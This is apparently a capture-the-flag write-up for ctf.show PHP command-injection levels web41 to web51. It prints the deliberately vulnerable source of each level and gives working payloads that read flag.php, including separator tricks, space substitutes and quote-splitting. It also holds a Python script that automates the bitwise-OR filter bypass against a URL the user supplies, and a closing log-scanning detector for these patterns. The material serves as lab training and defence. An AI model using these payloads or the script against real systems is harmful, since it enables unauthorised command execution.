web41
This one had me stuck for a long time; special thanks to 傅师傅 for the guidance.
Look at the challenge source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: 羽
# @Date: 2020-09-05 20:31:22
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:40:07
# @email: 1341963450@qq.com
# @link: https://ctf.show
*/
if(isset($_POST['c'])){
    $c = $_POST['c'];
    if(!preg_match('/[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-/i', $c)){
        eval("echo($c);");
    }
}else{
    highlight_file(__FILE__);
}
?>
A lot is filtered, but `(`, `)` and `|` are not, so the filter can be bypassed with the bitwise OR operation.
Here is the script:
import re
import urllib.parse
import requests

# Build a lookup table for the bitwise-OR bypass. For every printable target
# byte k (32..126) find two bytes i and j with i|j == k such that neither
# chr(i) nor chr(j) is hit by the challenge's regex, then store one line per
# pair as "<chr(k)> %ii %jj" (percent-encoded so the bytes survive in a text file).
with open('web或运算绕过.txt','w') as a:
    for i in range(126):
        for j in range(126):
            k = i|j
            if k<=126 and k>=32:
                if re.search(r'[0-9]|[a-z]|\^|\+|\~|\$|\[|\]|\{|\}|\&|\-', chr(i)+chr(j), re.I) ==None:
                    b = chr(k)+' %'+'{0:02x}'.format(int(i))+' %'+'{0:02x}'.format(int(j))
                    a.write(b+'\n')

url = input("[+]请输入url:")
while 1:
    # Encode the function name: begin collects the first operand of every
    # character, end the second, giving ("%ii%ii..."|"%jj%jj...").
    function = input('[+]:输入你的function:')
    begin ='("'
    end = '"'
    with open('web或运算绕过.txt','r') as a:
        c = a.readlines()
    for i in function:
        for b in c:
            # b[0] is the target character, b[2:5] is %ii, b[6:9] is %jj
            if i==b[0]:
                begin+=b[2:5]
                end+=b[6:9]
                break
    end+="\")"
    begin+='"'
    param = begin+'|'+end

    # Encode the argument the same way and append it as ("..."|"..."),
    # so the final expression is ("function")("command").
    command = input("[+] 输入你的command:")
    begin ='("'
    end = '"'
    with open('web或运算绕过.txt','r') as a:
        c = a.readlines()
    for i in command:
        for b in c:
            if i==b[0]:
                begin+=b[2:5]
                end+=b[6:9]
                break
    end+="\")"
    begin+='"'
    param+= begin+'|'+end

    # Decode the percent-encoding so the raw bytes are POSTed as parameter c
    data = {
        'c':urllib.parse.unquote(param)
    }
    res = requests.post(url=url,data=data)
    print(res.text)
Key points: 1. Inside eval("echo($c);"), the form ('function')('command') calls a function with an argument and echoes the result.
2. The bitwise OR operation bypasses the filtered characters.
3. Payloads that contain a newline apparently do not work when sent directly from HackBar; another method is needed, reason unknown.
web42
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 20:51:55
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    system($c." >/dev/null 2>&1");
}else{
    highlight_file(__FILE__);
}
As you can see, both the error output and the standard output are redirected to /dev/null, so nothing comes back.
Solution 1:
payload: ?c=cat flag.php%0a
Just use a newline: it ends the first command, so the appended >/dev/null 2>&1 no longer applies to it.
Solution 2:
payload: ?c=cat flag.php;
Separate the commands with a semicolon.
web43
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:51
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
The semicolon is banned now.
So use && or || instead; && runs the second command only after the first one has succeeded.
Solution 1:
payload: ?c=tac *%26%26
Note: remember to URL-encode & as %26.
Solution 2:
payload: ?c=tac * %0a
payload: ?c=nl * %0a
web44
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:32:01
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/;|cat|flag/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
Much the same as above.
web45
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:35:34
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| /i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
Spaces are filtered now.
Space-bypass tricks: 1. ${IFS} (but it cannot be written as $IFS) 2. $IFS$9 3. %09 4. <
So the two solutions are mostly the same as above.
payload: ?c=tac%09*%0a
web46
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:50:19
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
Digits are filtered as well now.
It doesn't matter.
Same as above:
payload: ?c=nl<fla''g.php%0a
web47
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 21:59:23
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
Nothing much changes; same as above.
web48-49
All the same.
web50-51
Source:
<?php
/*
# -*- coding: utf-8 -*-
# @Author: h1xa
# @Date: 2020-09-05 20:49:30
# @Last Modified by: h1xa
# @Last Modified time: 2020-09-05 22:32:47
# @email: h1xa@ctfer.com
# @link: https://ctfer.com
*/
if(isset($_GET['c'])){
    $c=$_GET['c'];
    if(!preg_match("/\;|cat|flag| |[0-9]|\\$|\*|more|less|head|sort|tail|sed|cut|awk|strings|od|curl|\`|\%|\x09|\x26/i", $c)){
        system($c." >/dev/null 2>&1");
    }
}else{
    highlight_file(__FILE__);
}
As you can see, *, %09 and %26 are all gone now, but the nl< form and || still get through. Note: with nl, * and ? cannot be used.
So the payload is: ?c=nl<fla''g.php%7C%7C
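As an added example (my own code, not part of this writeup or of ctf.show), here is a small detector that pulls the c parameter out of constructed access-log lines, URL-decodes it and names which of the evasions used across web41-51 it contains: newline and semicolon separators, && and ||, tab and ${IFS} as space substitutes, < redirection, fla''g quote-splitting and the ("..."|"...") string OR. The log lines, rule names and request format are assumptions; the web41 eval payload travels in a POST body, so the OR rule only fires where request bodies are logged.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines (not captured from any challenge server); each
# carries one payload shape from the writeup, the last two are benign controls.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Sep/2020:20:50:00 +0000] "GET /?c=cat%20flag.php%0a HTTP/1.1" 200 12
10.0.0.5 - - [05/Sep/2020:20:51:00 +0000] "GET /?c=tac%20*%26%26 HTTP/1.1" 200 12
10.0.0.5 - - [05/Sep/2020:20:52:00 +0000] "GET /?c=tac%09*%0a HTTP/1.1" 200 12
10.0.0.5 - - [05/Sep/2020:20:53:00 +0000] "GET /?c=nl%3Cfla''g.php%7C%7C HTTP/1.1" 200 12
10.0.0.5 - - [05/Sep/2020:20:54:00 +0000] "GET /?c=ls HTTP/1.1" 200 12
10.0.0.5 - - [05/Sep/2020:20:55:00 +0000] "GET /?page=about HTTP/1.1" 200 12
"""

# One rule per evasion used in web41-51, applied to the URL-decoded value so
# that %0a, %09, %26 and %7c cannot hide the characters they encode.
RULES = [
    ("newline separator",   re.compile(r"[\r\n]")),
    ("semicolon separator", re.compile(r";")),
    ("chaining operator",   re.compile(r"&&|\|\||[&|]")),
    ("space substitute",    re.compile(r"\t|\$\{?IFS")),
    ("redirection",         re.compile(r"[<>]")),
    ("quote-split keyword", re.compile(r"\w(?:''|\"\")\w")),      # fla''g
    ("string bitwise OR",   re.compile(r'\("[^"]*"\|"[^"]*"\)')),  # ("..."|"...")
]

REQUEST_RX = re.compile(r'"(?:GET|POST) (\S+) HTTP/')

def flag_value(value: str) -> list:
    """Names of every rule the decoded parameter value triggers."""
    return [name for name, rx in RULES if rx.search(value)]

def scan_log(text: str, param: str = "c") -> dict:
    """Map 1-based line numbers to the rules their `param` value triggers."""
    hits = {}
    for n, line in enumerate(text.splitlines(), 1):
        m = REQUEST_RX.search(line)
        if not m:
            continue
        query = parse_qs(urlsplit(m.group(1)).query, keep_blank_values=True)
        for value in query.get(param, []):
            reasons = flag_value(value)
            if reasons:
                hits[n] = reasons
    return hits

if __name__ == "__main__":
    for n, reasons in scan_log(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(reasons)}")
```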